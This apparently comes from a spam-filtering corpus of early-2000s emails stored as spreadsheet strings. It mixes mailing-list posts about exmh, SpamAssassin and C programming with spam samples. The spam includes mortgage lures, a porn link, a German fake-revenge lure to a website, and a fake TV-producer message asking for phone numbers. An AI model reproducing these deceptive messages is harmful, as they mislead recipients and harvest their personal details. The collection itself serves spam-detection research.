  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#cccccc topMargin=1&gt;
 &lt;DIV style="BACKGROUND: #e4e4e4; font-color: black"&gt;&lt;/DIV&gt;
 &lt;B&gt;&lt;FONT face=Arial size=4&gt;
 &lt;A HREF="http://www.geocities.com/t_tricktvescort/ttrick.html"&gt;Click here to see the Bang Bus&lt;/A&gt;&lt;br&gt;&lt;br&gt;It is wild!!!!!!
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 tepyycemkckiflbsvpcyi
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 It has been signed conforming to RFC2015.
 You'll need PGP or GPG to check the signature.
 ------------=_1031700302-417-36
 Content-Type: text/plain; charset=us-ascii
 On Tue, 10 Sep 2002 09:27:12 PDT, J C Lawrence writes:
 &gt;I run exmh on my desktops at home and at work with the resulting
 &gt;exmh windows being displayed on both my work and home desktops (gratis
 &gt;SSH X11 forwarding).  In fact, your message was read and replied to
 &gt;(this message) while at work, using an exmh instance running on my home
 &gt;machine.
 So you have 4 copies (1+1 per desktop) of exmh running?
 That's what I usually do, but what I'd really like would be some 
  automagism to tell them "Flist", "Rescan Folder", which I now do 
  manually whenever I'm going to work at the "other" machine.
 cheers,
 &amp;rw
 -- 
 -- In the first place, God made idiots;
 -- though this was for practice only;
 -- then he made users. (Mark Twain, modified)
 ------------=_1031700302-417-36
 Content-Type: application/pgp-signature; name="signature.ng"
 Content-Disposition: inline; filename="signature.ng"
 Content-Transfer-Encoding: 7bit
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9fn9OE0NzSJr53oIRAkEtAJwLbcoH2lx/CnhG/eQN1mJMDqnO7wCeLrKo
 wFXc+1hVHd8T3cQZbbOYeUk=
 =40Qu
 -----END PGP SIGNATURE-----
 ------------=_1031700302-417-36--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin MANIFEST,1.80,1.81 Makefile.PL,1.31,1.32
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin
 In directory usw-pr-cvs1:/tmp/cvs-serv21113
 Modified Files:
 	MANIFEST Makefile.PL 
 Log Message:
 patch from Radoslaw Zielinski &lt;radek@karnet.pl&gt;: rpm support for PLD Linux Distribution.  Makefile.PL created Makefile, which caused problems with DESTDIR; fixed. also rc-script for PLD
 Index: MANIFEST
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/MANIFEST,v
 retrieving revision 1.80
 retrieving revision 1.81
 diff -u -d -r1.80 -r1.81
 --- MANIFEST	23 Jul 2002 13:43:40 -0000	1.80
 +++ MANIFEST	23 Jul 2002 15:34:00 -0000	1.81
 @@ -123,3 +123,4 @@
  tools/translation_prep.pl
  masses/lint-rules-from-freqs
  masses/freqdiff
 +spamd/pld-rc-script.sh
 Index: Makefile.PL
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/Makefile.PL,v
 retrieving revision 1.31
 retrieving revision 1.32
 diff -u -d -r1.31 -r1.32
 --- Makefile.PL	4 Jul 2002 14:26:15 -0000	1.31
 +++ Makefile.PL	23 Jul 2002 15:34:00 -0000	1.32
 @@ -1,6 +1,6 @@
  require 5.005;
 -my $DEF_RULES_DIR	= '$(PREFIX)/share/spamassassin';
 +my $DEF_RULES_DIR	= '$(DESTDIR)$(PREFIX)/share/spamassassin';
  my $LOCAL_RULES_DIR	= '/etc/mail/spamassassin';
 @@ -83,7 +83,7 @@
      # do this with MakeMaker without it trying to build the perl
      # modules as .so's :(
 -qq{
 +qq#
  RULES		= $rulesfiles
 @@ -98,7 +98,7 @@
  DEF_RULES_DIR	= $DEF_RULES_DIR
  LOCAL_RULES_DIR	= $LOCAL_RULES_DIR
 -}. q{
 +#. q#
  pm_to_blib: spamassassin doc/.made
 @@ -159,5 +159,6 @@
  	touch doc/.made
  	-rm -f pod2htm*
 -};
 +#;
 +
  }
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] [OT] MacOSX mailing list?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 Sorry for the OT. Just wondering if anybody knows of a similar type mailing
 list specifically dealing with MacOSX?  (which, FYI is a version of BSD)
 Sln,
 Tim
 -- 
 One month on the internet in Ireland: Eur720
 One month on the internet in Britain: Eur 25
 Visit http://www.irelandoffline.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Michael Moncur" said:
 &gt; My corpus is about 50% spamtrap spam at any given time. Let me know if I
 &gt; should leave that out next time, I do keep it separate. My spamtraps are
 &gt; pretty clean of viruses and bounce messages most of the time.
 IMO spamtrap data that's well-cleaned and monitored is fine.
 To my mind there's 3 types of spamtraps:
   1. old user addresses, recycled into spamtraps when the user closes
     the account
   2. old user addresses, recycled into spamtraps several months after the
     user closes the account, scanned for newsletters, unsubscribed
     from them etc.
   3. real spamtrap addresses to trap website crawlers.
 The latter 2 are the most effective, but #1 is a real PITA; it takes lots
 of maintainance to avoid ham getting in there.  Some of my spamtrap data
 had a few 1's contributed by ISPs, and I hadn't spent enough time sifting
 for legit mail that was slipping through.  So I felt better leaving
 them out for this run, apart from what I'd hand-cleaned.
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: .. kennst mich noch ? nehrb
</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,
 Wir haben uns schon ziemlich lange nicht mehr gesehen, a ich ja nur noh Zeit fr meine Freundin hatte. 
 DAMIT ist jetzt Schlu.
 Alex hat mich sitzen lassen. Du erhlst dieses Mail, weil ich Dir mal zeigen will, wie die Kleine wirklich so drauf ist.
 Ich hab jetzt vor lauter Wut eine eigene Homepage gebastelt, da kannste mal was sehen:
 http://alexandra.hobby.privatseite.to
 Wie findest Du das ?
 lg
 Peter
 gcoakgwnibgafjecarccjbjiiqlluijseublait
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;
 &gt;&gt; http://www.post-gazette.com/columnists/20020905brian5.asp
 GAB&gt; I thought this nekkid URL was going to be about the
 GAB&gt; infringement of 1st amendment rights for broadcasters
 GAB&gt; and proposed campaign finanice restrictions preventing them
 GAB&gt; from making money on advertisements that are deemed
 GAB&gt; thinly veiled campaign contributions by some arbitrary
 GAB&gt; government board.  As it was posted to "discussion" I
 GAB&gt; thought there'd be some.
 GAB&gt; Instead it's a Post-Gazette column by Brian O'Neill
 GAB&gt; lamenting the fact that some people know how to
 GAB&gt; fill out a permit so that they can take advantage
 GAB&gt; of their right to peaceable assembly.  Obviously
 GAB&gt; he's poking fun at the idea that specific groups
 GAB&gt; get specific "zones" and that it's not up to the
 GAB&gt; police to decide what messages and signs get put into
 GAB&gt; what zones to most expediently keep order.  
 Oh thats right Greg.  Because was explicitly clear that the pro-Bush
 folks went out and did the permit dance.   So where in the article is
 this again?
 Lets get something straight here.   This -is- a First Amendment issue.
 Public streets, provided one isn't blocking traffic, generally tend to
 be sorta ok, at least from my last interpretation of Con Law a few
 years ago (I'll feign ignorance wrt the fact that laws may have
 changed, and the specific facts in this case are weak).    IF this guy
 _was_ merely holding a sign (which it seems was the case for all the
 pro-bush folks) he did nothing wrong.  He certainly didn't do enough
 of a wrong to warrant a disorderly conduct charge.
 I'll play with your perspective though.   Lets assume a few things.
 If I walk into the city office and tell them I want to peacably
 assemble against Bush, do you think they'll give me a permit?
 Probably not.   So I lie.   Then the cop does what happened in this
 scenario.  HE walks up, checks my permit and finds out that I
 falsified my statement to get this said document.   He arrests me.
 End of story.
 GAB&gt; The problem is that politics have gotten so muddied
 GAB&gt; nowadays, that shouting down and unpeaceably disrupting
 GAB&gt; political rallies that you don't agree with has become
 GAB&gt; common practice.  The courts have constantly ruled
 GAB&gt; that there are some restrictions on the first amendment.
 GAB&gt; They teach you that your very first year of law school.
 I'll agree with Owen on this one.  Muddied my ass.  How hard is it to
 chose between a Republocrat or a Demipublican?   Not very.  Shouting
 down has grown to become the answer because the government, over a
 span of years, and with the help of the Courts -has- limited the
 rights we have as citizens under the First Amendment.    If you
 question the policy about terrorism, or drugs, or Iraq, or Bush in
 general, you're aiding terrorism.   If you challenge the beliefs of
 the folks attending the various shadowy G8 conferences, you're an
 anarchist, and you're herded off to a 'designated protest spot' miles
 away from anything.   Part of the point of speech is to be -heard-.
 I can scream on my soapbox in the forest somewhere, and while thats
 speech, its not effective speech.  People are screaming and shouting
 over the political figures because they cannot be  heard in any other
 way.
 GAB&gt; I think that given the information as laid out by the story,
 GAB&gt; Mr. O'Neill has confused free speech with action.  Free
 GAB&gt; speech or even protected speech as practiced by almost 
 GAB&gt; every American seems to involve the ability to communicate
 GAB&gt; an idea to an unknown audience.  Action involves directing
 GAB&gt; a specific comment to a specific well-defined individual or audience
 GAB&gt; that has immediate, harmful, and sometimes physical 
 GAB&gt; effects that is easily forseeable by any reasonable person. 
 Getting back to my original point.  How do you communicate  an idea to
 an unknown audience, if you're miles from where the audience is?   How
 do you bypass the rules for being -miles- away from the audience
 without violating the rules of the regime?  I don't think Mr. Nell was
 throwing pies at Bush.  A sign, the last time I checked, didn't cause
 physical injury, or even emotional harm.  If I remember Cohen v.
 California, 403 U.S. 15 (1971), its not the individual speaking that
 has the requirement to desist, but the individual listening who has
 the option to leave.
 Just my .02, while its still considered legal.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Advance Your Career and Find a Great Job!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Job Seeker,
 When you create a FREE My Net-Temps account, you have access to the tools
 and resources for finding your next job more effectively.  It only takes
 a minute. Plus you get news and tips specific to your profession.
 Everything you need is in your My Net-Temps account!
 *  Post up to 3 resumes with the Build My Resume and Copy &amp; Paste tools
 *  Setup custom search agents to automatically receive job leads
 *  Resume statistics to track your success
 *  Resume, cover letter and thank you letter writing tips
 *  Salary calculator
 *  Career articles and weekly newsletter
 *  Access to over 7500 recruiters that can help your job search
 Setup your account now at http://www.net-temps.com/careerdev/
 The Net-Temps Team
 www.net-temps.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: Stop Those Presses! Blonds, It Seems, Will
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 Excellent evidence of the herd. Just imagine if the anonymous noise injected into our world newsphere (noosphere?) was, say, a fraudulent story that a stock accounting scandal had been accused and the evildoers were shorting. 
 Oh, wait, that happened. An unemployed Orange County student took down Emulex...
 Enjoy!
   Rohit
 khare@alumni.caltech.edu
 Stop Those Presses! Blonds, It Seems, Will Survive After All
 October 2, 2002
 By LAWRENCE K. ALTMAN 
 Apparently it fell into the category "too good to check."
 Last Friday, several British newspapers reported that the
 World Health Organization had found in a study that blonds
 would become extinct within 200 years, because blondness
 was caused by a recessive gene that was dying out. The
 reports were repeated on Friday by anchors for the ABC News
 program "Good Morning America," and on Saturday by CNN. 
 There was only one problem, the health organization said in
 a statement yesterday that it never reported that blonds
 would become extinct, and it had never done a study on the
 subject. 
 "W.H.O. has no knowledge of how these news reports
 originated," said the organization, an agency of the United
 Nations based in Geneva, "but would like to stress that we
 have no opinion of the future existence of blonds." 
 All the news reports, in Britain and the United States,
 cited a study from the World Health Organization - "a
 blonde-shell study," as The Daily Star of London put it.
 But none reported any scientific details from the study or
 the names of the scientists who conducted it. 
 On "Good Morning America," Charles Gibson began a
 conversation with his co-anchor, Diane Sawyer, by saying:
 "There's a study from the World Health Organization, this
 is for real, that blonds are an endangered species. Women
 and men with blond hair, eyebrows and blue eyes, natural
 blonds, they say will vanish from the face of the earth
 within 200 years, because it is not as strong a gene as
 brunets." 
 Ms. Sawyer said she was "somewhat of a natural blonde."
 Jeffrey Schneider, a spokesman for ABC News, said the
 anchors got the information from an ABC producer in London
 who said he had read it in a British newspaper. 
 In London, The Sun and The Express both reported that
 unnamed scientists said blonds would survive longest in
 Scandinavia, where they are most concentrated, and expected
 the last true blond to hail from Finland. 
 The British accounts were replete with the views of
 bleached blonds who said hairdressers would never allow
 blondness to become extinct, and doctors who said that rare
 genes would pop up to keep natural blonds from becoming an
 endangered species. 
 Journalists in London said last night that the source of
 the reports was probably one of several European news
 agencies that are used by the British press, but it
 remained unclear which one. 
 Tim Hall, a night news editor at The Daily Mail, said the
 report was probably distributed by The Press Association,
 Britain's domestic news agency. "Several papers picked it
 up," he said. 
 But Charlotte Gapper, night editor at The Press
 Association, said that although it had considered running
 the report on Sept. 27, it had decided not to after talking
 to the World Health Organization. 
 "We didn't do that story because we made an inquiry to the
 World Health Organization first," she said. "They told us
 that report was two years old, and had been covered at the
 time. They said it had been picked up again that day by a
 German news agency." 
 She added that she did not know which agency the
 organization was referring to. 
 Dr. Ray White, a geneticist at the University of California
 at San Francisco, said that the disappearance of a gene for
 blond hair "sounds patently incorrect."
 http://www.nytimes.com/2002/10/02/health/02BLON.html?ex=1034599071&amp;ei=1&amp;en=3a0e4f0b2b251593
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I don't know how one can expect better and more secure code from the
 community when this being a security list some post like this shows
 clearly no knowledge of C.
 On Fri, Nov 22, 2002 at 10:27:53PM +0500, Ali Saifullah Khan wrote:
 &gt; Here is a test done on the return of sizes by sizeof() using pointers.
 &gt; 
 &gt; #include &lt;iostream.h&gt;
 &gt; 
 &gt; int main(void) {
 &gt;  char *testbuff[1024];
    ^^^^^^^^^^^^^^^^^^^^
 Read it like this: new array with 1024 elements of type pointer to char.
 As a pointer occupies the natural word size (32 bits or 64bits), no wonder
 you get 4*1024 (sizeof(char *) * numer_of_elements).
 &gt;  int len = sizeof(testbuff);
 &gt;  cout &lt;&lt; len &lt;&lt; "\n";
 &gt;  return 0;
 &gt; }
 &gt; using " int len = sizeof((char*)testbuff); "
 sizeof returns the size of types. You can use it with vars (and then the
 normal form is sizeof var, not sizeof(var)), but if you're changing the
 type with the var with a cast, of course you'll get the size of that new
 type.
 Regards,
 Luciano Rocha
 -- 
 Consciousness: that annoying time between naps.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 3.5% fixed payment 30 year loan
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;3&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="background-color: #FFFF99"&gt;
 &lt;div style="width: 759; height: 96"&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="7"&gt;&amp;nbsp;3.5% FIXED PAYMENT 30 YEARS&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;font lang="0" color="#008000" FAMILY="SANSSERIF"&gt;&lt;span class="851072317-12042002"&gt;&lt;font color="#0000ff"&gt;
 &lt;p align="center"&gt;&lt;font size="2" face="Arial"&gt;&lt;span class="621254317-25042002"&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;font color="#008000"&gt;&lt;strong&gt;
 Lenders
 make&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;font face="Arial" size="2"&gt;&lt;strong&gt;
 you wait...They Demand to Interview you...&lt;br&gt;
 They Intimidate you...They Humiliate you...&lt;br&gt;
 And All of That is While They Decide If They Even Want to&lt;br&gt;
 Do Business With You...&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;font lang="0" color="#000000" FAMILY="SANSSERIF"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font lang="0" color="#000000" size="5" FAMILY="SANSSERIF"&gt;&lt;b&gt;&lt;font face="Arial"&gt;We
 Turn the Tables on Them...&lt;br&gt;
 Now, You're In Charge&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font lang="0" color="#000000" FAMILY="SANSSERIF"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;font size="2" face="Arial"&gt;Just Fill Out Our Simple Form and They Will Have to
 Compete For Your Business...&lt;br&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;font lang="0" color="#000000" family="SANSSERIF" size="3"&gt;
 &lt;font face="Arial"&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;a href="http://www.1strefinance.com/apply.htm"&gt;&lt;b&gt;http://www.1strefinance.com/apply.htm&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="2" face="Arial" lang="0" color="#000000" FAMILY="SANSSERIF"&gt;&lt;b&gt;We
 have hundreds of loan programs, including:&lt;/b&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font size="2" face="Arial" lang="0" color="#008000" FAMILY="SANSSERIF"&gt;&lt;strong&gt;&lt;em&gt;Purchase
 Loans&lt;br&gt;
 Refinance&lt;br&gt;
 Debt Consolidation&lt;br&gt;
 Home Improvement&lt;br&gt;
 Second Mortgages&lt;br&gt;
 No Income Verification&lt;/em&gt;&lt;/strong&gt;&lt;span class="533500417-12042002"&gt;&lt;font color="#0000ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;a href="http://www.1strefinance.com/apply.htm"&gt;&lt;b&gt;&lt;font lang="0" family="SANSSERIF" size="3" color="#0000FF"&gt;
 http://www.1strefinance.com/apply.htm&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;font lang="0" color="#000000" size="2" 
 FAMILY="SANSSERIF"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font lang="0" face="Arial" color="#000000" size="1" FAMILY="SANSSERIF"&gt;I&lt;/font&gt;&lt;font lang="0" face="Tahoma" color="#
 000000" size="1" FAMILY="SANSSERIF"&gt;f
 you no longer wish to receive any of our mailings you may be&lt;br&gt;
 permanently removed by &lt;a href="mailto:info@lenderscompete4you.com"&gt;mailto:info@lenderscompete4you.com&lt;/a&gt;
 If there has been any inconvenience we apologize.&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] German spam corpus / foreign language spam
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been lurking the SA lists since I installed SA on a production
 machine a while back. While SA did a surprisingly accurate job on
 detecting English language spam, it did not succeed very well on German
 language spam, which I keep getting increasing amounts of lately. I've
 got a lousy results with out of the box scores, very few spam is acually
 cought.
 What is the strategy with respect to foreign language spam recognition
 in SA? I've seen extremely few non-english rules. Is there foreign
 language rule development going on? Has anybody done work on German
 spam?
 In any case, I've started spam/nonspam corpi consisting of only German
 (and Swiss-German, respectively) messages, to be able to help with
 German rules. Anybody willing to contribute to the corpus feel free to
 resend/bounce German spam in a sane way to spam@roe.ch . I cannot be
 bothered to subscribe to SAsightings just for the odd German spam every
 hundred++ messages.. how about a list for foreign language spam
 sightings?
 Has anybody done this before or am I on the edge of duplicating effort
 here?
 I've been thinking on this a bit. I think it would be best if there
 would be general provisions for foreign language rules. In the spirit of
 the ok_languages option; let users easily enable or disable rules in
 certain languages. Like a foreign_rules option which could be used to
 control which foreign rulesets are active. Usually people would want to
 use checks in all languages which are in the ok_languages list.
 Is there any development or are there plans along those lines? Are there
 other people willing to contribute to effective spam filtering rules in
 German language?
 Any kind of feedback is welcome, even flames ;)
 Cheers,
 Dan
 -- 
    Daniel Roethlisberger &lt;daniel@roe.ch&gt;
    OpenPGP key id 0x804A06B1 (1024/4096 DSA/ElGamal)
    144D 6A5E 0C88 E5D7 0775 FCFD 3974 0E98 804A 06B1
    &gt;&gt; privacy through technology, not legislation &lt;&lt;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</si>
  <si>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Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt; writes:
 &gt; I may be dense, but why would anyone want to utilize Habeus?  To me,
 &gt; it looks like a potential backdoor to anyone's defenses against spam.
 &gt;
 &gt; If I were a spammer, I'd simply set up a server, send out my spam with
 &gt; the Habeus headers and continue till I was reasonably certain I'd been
 &gt; reported.  Then I'd simply reconfigure the server and reconnect to a
 &gt; different IP.  As long as no one can establish my connection to the
 &gt; web sites my spam is directing people to, I'm home free.
 Here is the bug I opened:
   http://www.hughes-family.org/bugzilla/show_bug.cgi?id=762
 RBLs have the same problem, but there is no negative RBL header rule
 with a -20 score that can be forged, so the problem is unique to Habeas.
 &gt; Since I can set up spamassassin to I don't "lose" any email, what do I
 &gt; gain by making it easier for spam to get through??
 My primary issue is the magnitude of the negative score and that it was
 not determined empirically.  I am also concerned that it was added after
 the rules freeze, that such a major change was not discussed in advance,
 etc.
 There's also no evidence that the rule will actually reduce FPs.  People
 who are smart enough to use the rule are probably capable of writing
 email that doesn't look like spam (I'm not counting spam mailing lists
 which you need to be exempted from spam filtering).
 Dan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</si>
  <si>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[use Perl] Stories for 2002-09-19
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * How much does Perl, PHP, Java, or Lisp suck?
 +--------------------------------------------------------------------+
 | How much does Perl, PHP, Java, or Lisp suck?                       |
 |   posted by pudge on Wednesday September 18, @08:08 (links)        |
 |   http://use.perl.org/article.pl?sid=02/09/17/189201               |
 +--------------------------------------------------------------------+
 [0]brian_d_foy writes "A long time ago Don Marti started the OS
 Sucks-Rules-O-Meter, and Jon Orwant wrote his own Sucks-Rules-O-Meter for
 computer languages. Recently Dan Brian improved on that with a little bit
 of natural language processing. Now [1]The Perl Review makes pretty
 pictures of it all. Based on searches of AltaVista and Google, we found
 that not a lot of people think PHP or Lisp sucks, a lot think C++ and
 Java suck, and they put Perl is somewhere in the middle. Does Perl suck
 more than it use to suck, or has PHP just shot way ahead?"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/17/189201
 Links:
     0. http://www.theperlreview.com
     1. http://www.theperlreview.com/at_a_glance.html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</si>
  <si>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[ILUG] mirroring on a running system
</t>
  </si>
  <si>
    <t xml:space="preserve">Sound. I'll be there at 7ish so. 
 CW
 -----------
  I've to leave the girlfriend home first. So, I'll be there sometime just
 after seven.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Factories go flat while we dither over the euro
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655714,215/
 Date: 2002-10-08T03:30:52+01:00
 *Business: *The long-awaited recovery in Britain's manufacturing sector ground 
 to a halt in August, despite a sharp rise in car production, official figures 
 showed yesterday.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mortgage Information For You!........
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?&lt;BR&gt;
 &lt;BR&gt;
 Win a $30,000 mortgage just for trying to get your mortgage rates down, and a little cash in your pocket!!&lt;BR&gt;
 know who is telling you the truth! We can solve all your problems.&lt;BR&gt;
 &lt;BR&gt;
 Visit our site today and in two minutes you can have us searching thousands of &lt;BR&gt;
 programs and lenders for you. Get the truth, get the facts, get your options &lt;BR&gt;
 all in one shot. It's absolutely FREE, and you can be done in only two minutes, &lt;BR&gt;
 so &lt;A HREF="http://www.zonehosts.net/yourlocallenders/index.html"&gt;Click Right NOW&lt;/A&gt; and put your worries behind you!&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/HTML&gt;
  [247(^(PO1:KJ)_8J7BJK]
</t>
  </si>
  <si>
    <t xml:space="preserve">[Guido]
 &gt; Takers?  How is ESR's bogofilter packaged?  SpamAssassin?  The Perl
 &gt; Bayes filter advertised on slashdot?
 WRT the last, it's a small pile of Windows .exe files along with
 cygwin1.dll.  The .exes are cmdline programs.  One is a POP3 proxy.  If I
 currently have an email server named, say, mail.comcast.net, with user name
 timmy, then I change my email reader to say that my server is 127.0.0.1, and
 that my user name on that server is mail.comcast.net:timmy.  In that way the
 proxy picks up both the real server and user names from what the mail reader
 tells it the user name is.
 This is an N-way classifier (like ifile that way), and "all it does" is
 insert a
     X-Text-Classification:  one_of_the_class_names_you_picked
 header into your email before passing it on to your mail reader.  The user
 then presumably fiddles their mail reader to look for such headers and "do
 something about it" (and even Outlook can handle *that* much &lt;wink&gt;).
 The user is responsible for generating text files with appropriate examples
 of each class of message, and for running the cmdline tools to train the
 classifier.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] O.T. Habeus -- Why?
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 I may be dense, but why would anyone want to utilize Habeus?  To me, it looks 
 like a potential backdoor to anyone's defenses against spam.
 If I were a spammer, I'd simply set up a server, send out my spam with the 
 Habeus headers and continue till I was reasonably certain I'd been reported.  
 Then I'd simply reconfigure the server and reconnect to a different IP.  As 
 long as no one can establish my connection to the web sites my spam is 
 directing people to, I'm home free.
 Since I can set up spamassassin to I don't "lose" any email, what do I gain 
 by making it easier for spam to get through??
 - -- 
 - ------------------------------------------------------------------------
 Robin Lynn Frank---Director of Operations---Paradigm, Omega, LLC
 http://paradigm-omega.com              http://paradigm-omega.net
  2002.  All rights reserved.  No duplication/dissemination permitted.
 Use of PGP/GPG encrypted mail preferred. No HTML/attachments accepted.
 Fingerprint:  08E0 567C 63CC 5642 DB6D  D490 0F98 D7D3 77EA 3714
 Key Server:  http://paradigm-omega.com/keymaster.html
 - ------------------------------------------------------------------------
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9bRrzD5jX03fqNxQRAjQnAJsE55BZGj0MGZdLTuBTUZqTGeQLwQCfXPzV
 qfH+nyAg+m+ZKNvLi2BcJGI=
 =YsRI
 -----END PGP SIGNATURE-----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</si>
  <si>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Equitable mis-sold policies
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381147,215/
 Date: 2002-09-30T03:04:56+01:00
 *Money:* Struggling mutual insurance society admits to scale of mis-selling.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Here's Your Chance...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I am a TV producer for one of the three major networks and
 I am working on a new primetime special. We're looking for a 
 special story and thought you might be able to assist.
 THIS IS NOT A SALES PITCH FOR ANYTHING! 
 I AM REALLY LOOKING FOR A GREAT STORY!
 -----------------
 PLEASE READ THIS! 
 -----------------
 Here's the type of story we are seeking;
 Are you interested in finding a long lost love from 
 your past? 
 Your first love? 
 The one that got away?
 If you are, WE MAY BE ABLE TO MAKE YOUR DREAM COME TRUE!
 (if you are not, PLEASE send this to your single friends)
 To be considered for this rare national TV opportunity, 
 you MUST;
 1. Be single and available
 2. Have a sincere interest to find a former love
 3. Be willing to share your story on NATIONAL TV
 4. Be able to travel to Los Angeles (We pay for everything)
 If this is YOU...then here's what you need to do next-
 1. Reply to this email.
 2. Tell us WHO you are looking for. 
 3. Tell us WHY you want to find him/her. (Let your feelings out)
 4. Tell us WHERE they were last time you saw them (specifics)
 5. Tell us how to reach YOU BY PHONE- HOME, WORK, CELL, email
 If we cannot reach you, we will have to move on without you!
 We only need ONE story, so if you want it to be you...
